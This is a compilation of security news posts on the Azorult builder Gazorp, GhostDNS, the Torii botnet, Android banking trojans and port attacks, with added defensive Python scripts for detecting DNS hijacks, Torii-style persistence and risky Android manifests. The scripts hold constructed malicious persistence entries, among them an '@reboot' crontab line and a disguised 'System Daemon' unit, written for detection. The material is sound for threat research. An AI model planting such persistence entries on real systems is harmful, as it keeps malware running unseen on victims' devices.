Security researchers from Checkpoint have discovered in the Dark Web an online builder, dubbed Gazorp, that allows crooks to easily create customized binaries for the Azorult info-stealing malware.

The Gazorp builder allows generating for free the malicious code to steal passwords, payment information, cryptocurrency wallet data and more.

“On 17th September Check Point Research found a new online builder, dubbed ‘Gazorp’, hosted on the Dark Web. Gazorp is designed for building binaries of the popular malware, Azorult, an infostealer used for stealing user passwords, credit card information, ” states CheckPoint.

“Furthermore, the Gazorp service is provided free of charge and gives threat actors the ability to create fresh Azorult samples and corresponding panel server code, leaving them simply to provide their Command & Control (C&C) address. This address gets embedded into the newly created binary, which in turn can be distributed in any way the threat actor sees fit.”

Check Point researchers took the platform for a test-drive and found that Gazorp does, indeed, perform as advertised, “effectively” creating samples of Azorult version 3.0.

Experts at CheckPoint have tried the Gazorp builder and successfully generated working samples of Azorult version 3.0.

Gazorp Azorult Builder

This version of the malware was first observed in the wild five months ago; since then it has been updated twice, and experts observed versions 3.1 and 3.2 in live attacks.

Azorult has been around since at least 2016. Malware researchers at Proofpoint spotted a new version of the AZORult spyware in the wild, involved in a large email campaign on July 18, just 24 hours after it appeared on cybercrime forums on the Dark Web.

Experts also noted that Gazorp’s emergence on the Dark Web followed the leak of the code for Azorult’s panel (versions 3.1 and 3.2).

The availability of the code allows anyone to easily create their own version of the Azorult C&C panel. The experts added that the leak also contained a builder for the latest version of the malware; this builder isn’t the original one used by the authors, “it merely encoded and placed the C&C address string given to it as an argument by the user to a particular field in a ready-made binary.”

“It is possible then that the simple mechanism and the overall delivery of the recent versions to the public inspired Gazorp’s authors to introduce it online.” continues the analysis.

The online builder links to a Telegram channel used by the authors to update users on their activity and to share updates on the project.

Gazorp authors plan to implement future extensibility with a “modules” section, the ability to configure the panel and export the various databases to a file.

Experts believe we will soon see a spike in campaigns leveraging the Azorult info-stealer generated with the Gazorp builder.

“For now, it seems we are looking at a very early version of the Gazorp service (0.1), where the main product delivered is an enhanced Azorult C&C panel code. However, we do expect the project to evolve with time, and possibly produce new variants for Azorult.” concludes CheckPoint.

“Given that the service is free, it is also possible that new campaigns with Gazorp built binaries will start to emerge in higher scale in the wild. We will keep monitoring this threat and provide any insights on our research blog when such will come up.”

Pierluigi Paganini

(Security Affairs – Gazorp builder, malware)

The post The ‘Gazorp’ Azorult Builder emerged from the Dark Web appeared first on Security Affairs.

How Digital Transformation is forcing GRC to evolve

As new risks emerge, security and risk management are converging and driving the development of integrated risk management, writes David Walter, the Vice President of RSA's Archer division.

The post How Digital Transformation is forcing GRC to evolve appeared first on The Security Ledger.

NBlog Oct – phishing awareness & training module

It's out: a fully revised (almost completely rewritten!) awareness and training module on phishing.

Phishing is one of many social engineering threats, perhaps the most widespread and most threatening.

Socially-engineering people into opening malicious messages, attachments and links has proven an effective way to bypass many technical security controls.

Phishing is a business enterprise, a highly profitable and successful one making this a growth industry. Typical losses from phishing attacks have been estimated at $1.6m per incident, with some stretching into the tens and perhaps hundreds of millions of dollars.

Just as Advanced Persistent Threat (APT) takes malware to a higher level of risk, so Business Email Compromise (BEC) puts an even more sinister spin on regular phishing. With BEC, the social engineering is custom-designed to coerce employees in powerful, trusted corporate roles to compromise their organizations, for example by making unauthorized and inappropriate wire transfers or online payments from corporate bank accounts to accounts controlled by the fraudsters.

As with ordinary phishing, the fraudsters behind BEC and other novel forms of social engineering have plenty of opportunities to develop variants of existing attacks as well as developing totally novel ones. Therefore, we can expect to see more numerous, sophisticated and costly incidents as a result. Aggressive dark-side innovation is a particular feature of the challenges in this area, making creative approaches to awareness and training (such as NoticeBored!) even more valuable. We hope to prompt managers and professionals especially to think through the ramifications of the specific incidents described, generalize the lessons and consider the broader implications. We’re doing our best to make the organization future-proof. It’s a big ask though! Good luck.

Learning objectives

October’s module is designed to:
  • Introduce and explain phishing and related threats in straightforward terms, illustrated with examples and diagrams;
  • Expand on the associated information risks and controls, from the dual perspectives of individuals and the organization;
  • Encourage individuals to spot and react appropriately to possible phishing attempts targeting them personally;
  • Encourage workers to spot and react appropriately to phishing and BEC attacks targeting the organization, plus other social engineering attacks, frauds and scams;
  • Stimulate people to think - and most of all act - more securely in a general way, for example being more alert for the clues or indicators of trouble ahead, and reporting them.
Consider your organization’s learning objectives in relation to phishing. Are there specific concerns in this area, or just a general interest? Has your organization been used as a phishing lure, maybe, or suffered spear-phishing or BEC incidents? Do you feel particularly vulnerable in some way, perhaps having narrowly avoided disaster (a near-miss)? Are there certain business units, departments, functions, teams or individuals that could really do with a knowledge and motivational boost? Lots to think about this month!

Content outline



Get in touch to purchase the phishing module alone, or to subscribe to the NoticeBored service for more like this every month. Phishing is undoubtedly an important topic for awareness and training, but definitely not the only one. Build and sustain your corporate security culture through NoticeBored.

Security Affairs: GhostDNS malware already infected over 100K+ devices and targets 70+ different types of home routers

Security experts from Qihoo 360 NetLab spotted GhostDNS, a malware campaign that has already infected over 100,000 devices and targets more than 70 different router models.

Security experts from Qihoo 360 NetLab have uncovered an ongoing hacking campaign that leverages the GhostDNS malware. Attackers have already hijacked over 100,000 home routers; the malicious code rewrites the routers' DNS settings so that traffic is hijacked and users are redirected to phishing websites.

Between September 21 and 27, the GhostDNS campaign compromised more than 100,000 routers, most of them (87.8%) located in Brazil.

GhostDNS is reminiscent of the infamous DNSChanger malware, which made the headlines for its ability to change the DNS settings of infected devices.

GhostDNS scans for the IP addresses of routers protected by weak or no passwords, logs into them, and changes their DNS settings to point at a rogue DNS server operated by the attackers.

“Just like the regular dnschanger, this campaign attempts to guess the password on the router’s web authentication page or bypass the authentication through the dnscfg.cgi exploit, then changes the router’s default DNS address to the Rogue DNS Server[3] through the corresponding DNS configuration interface.” reads the analysis published by the experts.

“But this campaign has more, we have found three related DNSChanger programs, which we call Shell DNSChanger, Js DNSChanger and PyPhp DNSChanger according to their programming languages.”

GhostDNS

GhostDNS has a modular structure composed of four components:

1) DNSChanger module: the main module, designed to exploit targeted routers. It has three sub-modules, dubbed Shell DNSChanger, Js DNSChanger, and PyPhp DNSChanger:

  • Shell DNSChanger is written in shell script and combines 25 scripts that let the malware carry out brute-force attacks against routers or firmware packages from 21 different manufacturers.
  • Js DNSChanger is written in JavaScript and includes 10 attack scripts designed to infect 6 routers or firmware packages. It includes scanners, payload generators, and attack programs. The Js DNSChanger program is usually injected into phishing websites, so it works together with the Phishing Web module.
  • PyPhp DNSChanger is written in Python and PHP and contains 69 attack scripts targeting 47 different routers/firmware packages. The component has been found deployed on over 100 servers, most of them on Google Cloud, and includes a Web API, a scanner, and an attack module. Experts believe this sub-module is the core of DNSChanger, allowing attackers to scan the Internet for vulnerable routers.

2) Web Admin module: experts believe it implements an admin panel for the attackers, protected by a login page.

3) Rogue DNS module: the module resolves the targeted domain names to attacker-controlled web servers. At the time of the investigation the experts had no access to the Rogue DNS server, so it was not possible to know the exact number of DNS entries used to hijack legitimate domains.

4) Phishing Web module: the module implements phishing pages for the domains targeted in this campaign.

The attackers appear to be focused on Brazil, where they mainly targeted major banks.

“Currently the campaign mainly focuses on Brazil, we have counted 100k+ infected router IP addresses (87.8% located in Brazil), and 70+ router/firmware have been involved, and 50+ domain names such as some big banks in Brazil, even Netflix, Citibank.br have been hijacked to steal the corresponding website login credentials,” the researchers continue.

Experts warn of the threat that GhostDNS poses to the Internet because of its scalability and the multiple attack vectors it supports.
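The two client-side checks that expose this kind of hijack, as an added example that is not part of the NetLab analysis or of this post: parse the resolvers a host received over DHCP, classify each one against an allow-list, and compare the answer a high-value domain gets from the router's resolver with the answer from a trusted resolver. The DNS query and answer parser are hand-rolled so the script can be pointed at one specific server without extra libraries. The allow-list, the LAN ranges, the sample resolv.conf, the raw sample response and the answer sets are all constructed assumptions for the example.

```python
"""Client-side checks for a DNS-changer infection on the local router.

Added example for the GhostDNS post; not code from Qihoo 360 NetLab. A DNS
changer swaps the resolvers the router hands out over DHCP, so two checks from
any host on the LAN expose it: the configured resolvers are not the expected
ones, and a high-value domain resolves differently through the router than
through a trusted resolver. Allow-list, LAN ranges and sample data are constructed.
"""
import ipaddress
import re
import socket
import struct

TRUSTED_RESOLVERS = {"192.168.1.1", "1.1.1.1", "9.9.9.9"}   # assumption for this network
LAN_RANGES = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def parse_resolvers(resolv_conf):
    """Return the nameserver addresses from resolv.conf-style text, in order."""
    return re.findall(r"^\s*nameserver\s+(\S+)", resolv_conf, flags=re.M)


def classify_resolver(ip, trusted=TRUSTED_RESOLVERS):
    """'trusted', 'lan' (RFC 1918 address, probably the router itself) or 'unexpected'."""
    if ip in trusted:
        return "trusted"
    addr = ipaddress.ip_address(ip)
    return "lan" if any(addr in net for net in LAN_RANGES) else "unexpected"


def build_query(domain, txid=0x1234):
    """Minimal DNS query: header with RD set, one A/IN question."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(p)]) + p.encode() for p in domain.rstrip(".").split("."))
    return header + qname + b"\x00" + struct.pack(">HH", 1, 1)


def _skip_name(buf, off):
    """Advance past a DNS name, whether written out or a two-byte compression pointer."""
    while True:
        length = buf[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:
            return off + 2
        off += 1 + length


def parse_a_records(resp):
    """Collect the IPv4 addresses from the answer section of a DNS response."""
    _, _, qdcount, ancount, _, _ = struct.unpack_from(">HHHHHH", resp, 0)
    off = 12
    for _ in range(qdcount):
        off = _skip_name(resp, off) + 4          # skip QTYPE and QCLASS
    ips = set()
    for _ in range(ancount):
        off = _skip_name(resp, off)
        rtype, _, _, rdlen = struct.unpack_from(">HHIH", resp, off)
        off += 10
        if rtype == 1 and rdlen == 4:
            ips.add(socket.inet_ntoa(resp[off:off + 4]))
        off += rdlen
    return ips


def query_a(domain, resolver_ip, timeout=2.0):
    """Ask one specific resolver for the A records of domain (needs network access)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_query(domain), (resolver_ip, 53))
        data, _ = sock.recvfrom(4096)
    return parse_a_records(data)


def find_hijacked(local_answers, reference_answers):
    """Domains whose answers from the local resolver share no address with the trusted ones."""
    return sorted(d for d, ips in local_answers.items()
                  if reference_answers.get(d) and ips.isdisjoint(reference_answers[d]))


# Constructed sample data: a resolv.conf after the router's DHCP options were rewritten,
# one raw DNS response (example.com -> 203.0.113.10) and answer sets from both resolvers.
SAMPLE_RESOLV_CONF = "# generated by DHCP\nnameserver 203.0.113.53\nnameserver 192.168.1.1\n"
SAMPLE_RESPONSE = (
    b"\x12\x34\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00"  # header: 1 question, 1 answer
    b"\x07example\x03com\x00\x00\x01\x00\x01"            # question: example.com A IN
    b"\xc0\x0c\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04"  # answer: name ptr, A, IN, TTL 60, len 4
    b"\xcb\x00\x71\x0a"                                  # rdata: 203.0.113.10
)
LOCAL_ANSWERS = {"bank.example": {"203.0.113.10"}, "news.example": {"198.51.100.7"}}
REFERENCE_ANSWERS = {"bank.example": {"198.51.100.20"}, "news.example": {"198.51.100.7"}}


def audit(resolv_conf=SAMPLE_RESOLV_CONF, local=LOCAL_ANSWERS, reference=REFERENCE_ANSWERS):
    """Run both checks; in real use, fill local/reference with query_a() results."""
    resolvers = parse_resolvers(resolv_conf)
    return {
        "unexpected_resolvers": [r for r in resolvers if classify_resolver(r) == "unexpected"],
        "hijacked_domains": find_hijacked(local, reference),
    }


if __name__ == "__main__":
    print(audit())
```

In practice the reference answers should come from a resolver reached over a path the router cannot tamper with (DoH/DoT to a public resolver, or a resolver on a different network), since a rogue DNS server will happily answer correctly for everything except the handful of domains it is hijacking.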

Further details, including IoCs, are reported in the analysis published by Qihoo 360 NetLab.

Pierluigi Paganini

(Security Affairs – GhostDNS, IoT)

The post GhostDNS malware already infected over 100K+ devices and targets 70+ different types of home routers appeared first on Security Affairs.




GhostDNS: New DNS Changer Botnet Hijacked Over 100,000 Routers

Chinese cybersecurity researchers have uncovered a widespread, ongoing malware campaign that has already hijacked over 100,000 home routers and modified their DNS settings to hack users with malicious web pages—especially if they visit banking sites—and steal their login credentials. Dubbed GhostDNS, the campaign has many similarities with the infamous DNSChanger malware that works by

Security Affairs newsletter Round 182 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      Hackers target Port of Barcelona, maritime operations were not affected
·      New Virobot malware combines ransomware and botnet capabilities
·      A bug in Twitter Account Activity API exposed users messages to wrong developers
·      Critical flaw affects Cisco Video Surveillance Manager
·      Experts uncovered a new Adwind campaign aimed at Linux, Windows, and macOS systems
·      Firefox DoS issue crashes the browser and sometimes the Windows OS
·      Akamai Report: Credential stuffing attacks are a growing threat
·      Bitcoin Core Team fixes a critical DDoS flaw in wallet software
·      SHEIN Data breach affected 6.42 million users
·      White hat hacker found a macOS Mojave privacy bypass 0-day flaw on release day
·      Crooks leverage Kodi Media Player add-ons for malware distribution
·      Former NSA TAO hacker sentenced to 66 months in prison over Kaspersky Leak
·      Hide and Seek (HNS) IoT Botnet targets Android devices with ADB option enabled
·      0patch community released micro patches for Microsoft JET Database Zero-Day
·      Mutagen Astronomy Linux Kernel vulnerability affects Red Hat, CentOS, and Debian distros
·      Pangu hackers are back, they achieved the iOS 12 Jailbreak
·      Russian Sednit APT used the first UEFI rootkit ever seen in attacks in the wild
·      Talos experts published technical details for other seven VPNFilter modules
·      Uber agrees to pay $148 million in massive 2016 data breach settlement
·      CVE-2018-17182 - Google Project Zero reports a new Linux Kernel flaw
·      Facebook hacked – 50 Million Users Data exposed in the security breach
·      Port of San Diego hit by a cyber attack a few days after the attack on the Port of Barcelona
·      QRecorder app in the Play Store was hiding a Banking Trojan that targets European banks
·      Facebook: User shadow data, including phone numbers may be used by advertisers
·      Torii botnet, probably the most sophisticated IoT botnet ever
·      Trustwave expert found 2 credential leak issues in Windows PureVPN Client

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 182 – News of the week appeared first on Security Affairs.

Security Affairs: Torii botnet, probably the most sophisticated IoT botnet of ever

Avast spotted a new IoT botnet, tracked as Torii, that appears much more sophisticated and stealthy than the numerous Mirai variants previously analyzed.

Security researchers spotted a new IoT botnet, tracked as Torii, that appears much more sophisticated and stealthy than the numerous Mirai variants previously analyzed.

According to experts from Avast, the Torii bot has been active since at least December 2017 and can target a broad range of architectures, including ARM, MIPS, x86, x64, PowerPC, and SuperH.

The Torii IoT botnet stands out for the unusually large set of architectures it is able to target.

“Over the past week, we have been observing a new malware strain, which we call Torii, that differs from Mirai and other botnets we know of, particularly in the advanced techniques it uses.” reads the analysis published by Avast.

“Unlike the aforementioned IoT botnets, this one tries to be more stealthy and persistent once the device is compromised, and it does not (yet) do the usual stuff a botnet does like DDOS, attacking all the devices connected to the internet, or, of course, mining cryptocurrencies.”

According to the experts, the Torii botnet is being used to steal data from compromised IoT devices. The bot exfiltrates several pieces of information, including the hostname and process ID.

The malicious code has a modular structure capable of fetching and executing further commands and executables, and it uses multiple layers of encrypted communication to avoid detection.

Another peculiarity of the Torii botnet is that it implements at least six ways to achieve persistence on infected devices.

“Afterwards, the dropper makes sure that the second stage payload is executed and that it will remain persistent. It is unique in that it is remarkably thorough in how it achieves persistence.” continues the analysis.

“It uses at least six methods to make sure the file remains on the device and always runs. And, not just one method is executed – it runs all of them.

    1. Automatic execution via injected code into ~/.bashrc
    2. Automatic execution via “@reboot” clause in crontab
    3. Automatic execution as a “System Daemon” service via systemd
    4. Automatic execution via /etc/init and PATH. Once again, it calls itself “System Daemon”
    5. Automatic execution via modification of the SELinux Policy Management
    6. Automatic execution via /etc/inittab

Torii infects devices that expose Telnet protected by weak credentials; it first executes a sophisticated script that determines the architecture of the target.

The script then downloads the first-stage payload, which acts as a dropper for the second-stage payload.

Experts said that the bot component communicates with the CnC through active polling in an endless loop, waiting for commands to execute. Once a command has been executed, the bot replies with the results.

The samples analyzed by the experts were communicating with a command-and-control server located in Arizona.

At the time of the analysis, Telnet was the only vector used by the bot to compromise other devices.
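An audit of the persistence points listed above, added here as an example (it is neither Avast's code nor anything from Torii): each scanner takes file contents and returns findings, so it can be run over a mounted image of a device as well as a live host, and audit_host() wires the scanners to the usual paths. The "System Daemon" name and the scratch-directory heuristic come from the write-up; the sample file contents and the /tmp/.x/sysd path are constructed. The SELinux policy method (5 above) is not covered here and is best checked by listing loaded policy modules with semodule -l.

```python
"""Audit the Linux persistence points Torii abuses, on a live host or a mounted image.

Added example for the Torii post; not Avast's tooling. Torii plants itself in all of
the listed locations at once, so a defender only needs one of them to give it away.
Scanners take file contents; audit_host() maps them to real paths. "System Daemon"
and the scratch directories are indicators from the write-up; samples are constructed.
"""
import glob
import os
import re

SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/run/shm/")
SUSPECT_NAME = re.compile(r"system\s*daemon", re.I)                # name Torii gives itself
ABS_PATH = re.compile(r"(?:^|(?<=[\s=;&|(]))(/\S+)", re.M)          # absolute paths in commands


def suspicious_path(path):
    """Something run at boot from scratch space or a hidden directory is out of place."""
    return path.startswith(SCRATCH_DIRS) or "/." in path


def scan_shell(text, source):
    """~/.bashrc, /etc/init.d scripts, profile files: flag commands with odd paths."""
    return [(source, m.group(1)) for m in ABS_PATH.finditer(text) if suspicious_path(m.group(1))]


def scan_crontab(text, source="crontab"):
    """Any @reboot entry deserves a look; Torii uses it to relaunch its second stage."""
    return [(source, l.strip()) for l in text.splitlines() if l.lstrip().startswith("@reboot")]


def scan_systemd_unit(text, source):
    """Unit files calling themselves 'System Daemon' or starting from scratch dirs."""
    findings = []
    desc = re.search(r"^Description\s*=\s*(.*)$", text, re.M)
    if desc and SUSPECT_NAME.search(desc.group(1)):
        findings.append((source, "Description=" + desc.group(1).strip()))
    return findings + scan_shell(text, source)          # also catches ExecStart=/tmp/...


def scan_inittab(text, source="/etc/inittab"):
    """respawn/once/boot entries (id:runlevels:action:process) running odd commands."""
    findings = []
    for line in text.splitlines():
        fields = line.split(":", 3)
        if len(fields) == 4 and fields[2] in ("respawn", "once", "boot", "sysinit"):
            cmd = fields[3].strip()
            if cmd and (suspicious_path(cmd.split()[0]) or SUSPECT_NAME.search(cmd)):
                findings.append((source, line.strip()))
    return findings


def audit_host(root="/"):
    """Run every scanner against the usual locations under root (e.g. a mounted image)."""
    def read(path):
        try:
            with open(path, errors="replace") as fh:
                return fh.read()
        except OSError:
            return ""

    def under(rel):
        return os.path.join(root, rel)

    findings = []
    for rc in glob.glob(under("root/.bashrc")) + glob.glob(under("home/*/.bashrc")):
        findings += scan_shell(read(rc), rc)
    for tab in [under("etc/crontab")] + glob.glob(under("var/spool/cron/*/*")):
        findings += scan_crontab(read(tab), tab)
    for unit in glob.glob(under("etc/systemd/system/*.service")):
        findings += scan_systemd_unit(read(unit), unit)
    findings += scan_inittab(read(under("etc/inittab")), under("etc/inittab"))
    for script in glob.glob(under("etc/init.d/*")):
        if SUSPECT_NAME.search(os.path.basename(script)):
            findings.append((script, "init script named like Torii's service"))
        findings += scan_shell(read(script), script)
    return findings


# Constructed samples mimicking a Torii-style install of /tmp/.x/sysd.
SAMPLE_BASHRC = "alias ll='ls -l'\n/tmp/.x/sysd 2>/dev/null &\n"
SAMPLE_CRONTAB = "0 3 * * * /usr/bin/backup\n@reboot /tmp/.x/sysd\n"
SAMPLE_UNIT = "[Unit]\nDescription=System Daemon\n[Service]\nExecStart=/tmp/.x/sysd\nRestart=always\n"
SAMPLE_INITTAB = "1:2345:respawn:/sbin/getty 38400 tty1\nsd:2345:respawn:/tmp/.x/sysd\n"


def audit_samples():
    """Run the scanners over the constructed samples; every planted entry is found."""
    return (scan_shell(SAMPLE_BASHRC, "~/.bashrc") + scan_crontab(SAMPLE_CRONTAB)
            + scan_systemd_unit(SAMPLE_UNIT, "sysd.service") + scan_inittab(SAMPLE_INITTAB))


if __name__ == "__main__":
    for source, detail in audit_samples():
        print(f"{source}: {detail}")
```

The path heuristic is deliberately loose (it will flag a commented-out line too); on an embedded device the list of boot-time entries is short enough that a few false positives cost less than a missed one.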

According to BleepingComputer, the malicious code was also analyzed by the Italian cyber security expert Marco Ramilli, who noticed similarities to Persirai.

“Even though our investigation is continuing, it is clear that Torii is an example of the evolution of IoT malware, and that its sophistication is a level above anything we have seen before.” concludes the analysis.

“Once it infects a device, not only does it send quite a lot of information about the machine it resides on to the CnC, but  by communicating with the CnC, it allows Torii authors to execute any code or deliver any payload to the infected device. This suggests that Torii could become a modular platform for future use.”

Further details, including IoCs are reported in the analysis published by Avast.

Pierluigi Paganini

(Security Affairs – Torii IoT botnet, hacking)

The post Torii botnet, probably the most sophisticated IoT botnet of ever appeared first on Security Affairs.




Monero Price Analysis: XMR/USD Well Supported in Attempt to Clear Stubborn 15-week Range

The Monero price is being supported by a sturdy ascending trend line, running from 14th August, in its path to recovery. XMR/USD has been stuck within a stubborn range for 15-weeks now and will need stronger upside momentum to be breached. The Monero price has been showing some positive signs now over the past 6 […]

The post Monero Price Analysis: XMR/USD Well Supported in Attempt to Clear Stubborn 15-week Range appeared first on Hacked: Hacking Finance.

New Malware-as-a-Service Threat Targets Android Phones

Security researchers discovered an emerging malware-as-a-service threat from Russia that would allow cybercriminals to infect Android phones with malicious software and block users from running security solutions on their devices.

The offering, called Black Rose Lucy, has a dashboard that shows simulated victims in France, Israel and Turkey. This led researchers at Check Point Research to conclude that the Russian-speaking developers have likely run demos for prospective cybercrime groups interested in attacking targets in those countries. China is another likely target because it is the largest market for Android devices.

“Given time it could easily become a new cyber Swiss Army Knife that enables worldwide hacker groups to orchestrate a wide range of attacks,” the researchers warned in a threat report dated Sept. 13.

Malware-as-a-service is very much like any traditional cloud service, but instead of subscribing to a harmless application in the cloud, cyberthieves can subscribe to black-market malware services that provide them with all the tools they need to execute attacks.

How Black Rose Lucy Works

Black Rose Lucy has two main components:

  1. Lucy Loader, a dashboard that allows users to control an entire botnet of victim devices and deploy additional malware payloads.
  2. Black Rose Dropper, which targets Android phones, collects victim device data and can install extra malware from a remote command-and-control (C&C) server.

To infect phones, the dropper prompts victims to enable the Android accessibility service for an application called Security of the System, which is actually the dropper, according to Check Point Research. When enabled, Black Rose Lucy can grant itself device administrative privileges. When it receives Android Package Kit (APK) files from the C&C server, it installs the files by simulating user clicks.

Black Rose Lucy also has self-protection features. If popular security solutions or system cleaners are launched, it simulates a user click to the “back” or “home” button to exit the tools. The dropper also blocks users from performing a factory reset.

The researchers noted that Black Rose Lucy is likely designed to target China because its dropper pays attention to Chinese security and system tool applications.

How to Protect Your Network From Malware-as-a-Service Threats

The threat alert issued on the IBM X-Force Exchange advised IT organizations to update their antivirus software, apply the latest patches to all applications and operating systems, and monitor their environments for indicators of compromise (IoCs).

Security experts also recommend conducting hands-on security awareness training that includes immersive simulations and promotes organizationwide security buy-in from the top down.

The post New Malware-as-a-Service Threat Targets Android Phones appeared first on Security Intelligence.

QRecorder app in the Play Store was hiding a Banking Trojan that targets European banks

The QRecorder app in the Play Store impersonating a phone call and voice recording utility embedded a banking malware used to target European banks.

Security experts from ESET have discovered a malicious app in the official Google Play Store that impersonates a phone call and voice recording utility, it was hiding a banking malware used to target customers of European banks.

The malware, tracked as Razdel, is a variant of BankBot mobile banking Trojan.

According to the Czech Television, the malicious code targets apps from Raiffeisen Bank, as well as ČSOB and Česká Spořitelna.

Czech Police shared an identikit and ATM security camera pictures of a money mule withdrawing money from affected victims’ accounts at a Prague ATM.

The malware was hidden in the QRecorder app and, according to ESET security researcher Lukas Stefanko, the banking Trojan was downloaded and installed by over 10,000 users.

QRecorder app malware

The malicious QRecorder app is able to intercept SMS two-factor authentication (2FA) messages and asks for permission to display overlays on top of legitimate banking apps, controlling what the user sees on the device.

To avoid raising suspicions, the malicious application correctly implements the audio recording features.

Stefanko discovered that the threat actor behind the operation sends commands to the app within 24 hours of installation, for example to scan the device for specific banking apps.

The attacker uses Google Firebase messaging to communicate with compromised devices. If one of the targeted apps is installed on the device, the malware asks the user to activate the Accessibility service before downloading the payload, then uses that permission to download and execute the malicious payload automatically.

Once the malicious payload is downloaded it sets triggers for legitimate banking apps. If one of the targeted apps is launched by the user, the malware displays overlay to steal credentials.

“Before downloading payload it would request user to activate Accessibility service and using this permission it would automatically download, install and open malicious payload.” wrote Stefanko.

“Once payload is downloaded it sets triggers for legitimate banking apps. If one of the targeted apps is launched it would create similar like looking activity that overlays official app demanding credentials.”

According to the official statement of the Czech police, QRecorder infected five victims in the Czech Republic, stealing a total of over 78,000 euros from their accounts.

The analysis of the code revealed that the QRecorder malware is able to monitor a large number of banks, including Air Bank, Equa, ING, Bawag, Fio, Oberbank, and Bank Austria.

One of the most interesting aspects of this malware is that the threat actor created different payloads for each targeted bank.
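Both the QRecorder payload and the Black Rose Lucy dropper described earlier on this page lean on the same handful of Android grants: an accessibility service (to click through dialogs and install APKs), overlay drawing (to paint fake login screens), SMS access (to lift 2FA codes), device-admin (to resist removal) and package installation. Pulling those out of a decoded AndroidManifest.xml is a quick first pass before dynamic analysis. The triage below is an added example, not tooling from ESET or Check Point; the weights, the baseline permission set for a genuine voice recorder, and the sample manifest with its package and component names are all constructed assumptions.

```python
"""Static triage of an AndroidManifest.xml for banker/dropper capabilities.

Added example for the QRecorder and Black Rose Lucy posts; not ESET's or Check
Point's tooling. Works on the decoded manifest (e.g. from `apktool d app.apk`).
Weights, the voice-recorder baseline and the sample manifest are constructed.
"""
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"   # the android: attribute namespace

WEIGHTS = {"accessibility_service": 3, "overlay": 2, "sms_intercept": 2,
           "device_admin": 2, "install_packages": 2, "boot_persistence": 1}


def triage_manifest(xml_text):
    """Map each capability of interest to whether the manifest declares it."""
    root = ET.fromstring(xml_text)
    perms = {e.get(A + "name") for e in root.iter("uses-permission")}
    # BIND_* permissions are set on the component itself, not requested via uses-permission.
    bound = {e.get(A + "permission") for e in root.iter() if e.tag in ("service", "receiver")}
    actions = {e.get(A + "name") for e in root.iter("action")}
    return {
        "accessibility_service": "android.permission.BIND_ACCESSIBILITY_SERVICE" in bound
            or "android.accessibilityservice.AccessibilityService" in actions,
        "overlay": "android.permission.SYSTEM_ALERT_WINDOW" in perms,
        "sms_intercept": bool(perms & {"android.permission.RECEIVE_SMS", "android.permission.READ_SMS"}),
        "device_admin": "android.permission.BIND_DEVICE_ADMIN" in bound
            or "android.app.action.DEVICE_ADMIN_ENABLED" in actions,
        "install_packages": bool(perms & {"android.permission.REQUEST_INSTALL_PACKAGES",
                                          "android.permission.INSTALL_PACKAGES"}),
        "boot_persistence": "android.intent.action.BOOT_COMPLETED" in actions,
    }


def risk_score(caps):
    """Weighted sum of the capabilities present; accessibility abuse counts most."""
    return sum(WEIGHTS[k] for k, present in caps.items() if present)


def excess_permissions(xml_text, baseline):
    """uses-permission entries beyond what the app's advertised purpose would need."""
    root = ET.fromstring(xml_text)
    return sorted({e.get(A + "name") for e in root.iter("uses-permission")} - set(baseline))


def verdict(xml_text, baseline):
    """Combine score, capability list and excess permissions into one triage record."""
    caps = triage_manifest(xml_text)
    score = risk_score(caps)
    label = "banker/dropper-like" if score >= 5 else "review" if score >= 2 else "unremarkable"
    return {"score": score, "label": label,
            "capabilities": sorted(k for k, v in caps.items() if v),
            "excess_permissions": excess_permissions(xml_text, baseline)}


# What a genuine call/voice recorder would plausibly need (assumption).
VOICE_RECORDER_BASELINE = {"android.permission.RECORD_AUDIO", "android.permission.INTERNET",
                           "android.permission.WRITE_EXTERNAL_STORAGE"}

# Constructed manifest modelled on the behaviour described in both posts.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.qrecorder">
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
  <uses-permission android:name="android.permission.REQUEST_INSTALL_PACKAGES"/>
  <application android:label="Security of the System">
    <service android:name=".SecurityOfTheSystem"
             android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
      <intent-filter><action android:name="android.accessibilityservice.AccessibilityService"/></intent-filter>
    </service>
    <receiver android:name=".AdminReceiver" android:permission="android.permission.BIND_DEVICE_ADMIN">
      <intent-filter><action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/></intent-filter>
    </receiver>
    <receiver android:name=".BootReceiver">
      <intent-filter><action android:name="android.intent.action.BOOT_COMPLETED"/></intent-filter>
    </receiver>
  </application>
</manifest>"""


if __name__ == "__main__":
    print(verdict(SAMPLE_MANIFEST, VOICE_RECORDER_BASELINE))
```

The manifest only shows what an app is allowed to do, not what it does: QRecorder genuinely recorded audio, so a baseline comparison is what surfaces the SMS, overlay and install grants a recorder has no business holding. A dropper that fetches its real payload later, as Lucy does, will show fewer capabilities here, which is why the accessibility service alone is weighted high enough to trigger a review.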

The QRecorder app has been removed from the official Android store; the video below shows how the app operates.

Pierluigi Paganini

(Security Affairs – QRecorder app, malware)

The post QRecorder app in the Play Store was hiding a Banking Trojan that targets European banks appeared first on Security Affairs.

Security Affairs: Port of San Diego hit by a cyber attack a few days after the attack on the Port of Barcelona

Port of San Diego suffered a ransomware-based attack, a few days after the Port of Barcelona was hit by a cyber attack that caused several problems.

A few days ago the Port of Barcelona was hit by a cyber attack that caused several problems for the critical infrastructure; now another major international port has been targeted by attackers.

The second attack was reported on September 25 and hit the Port of San Diego, in the United States.

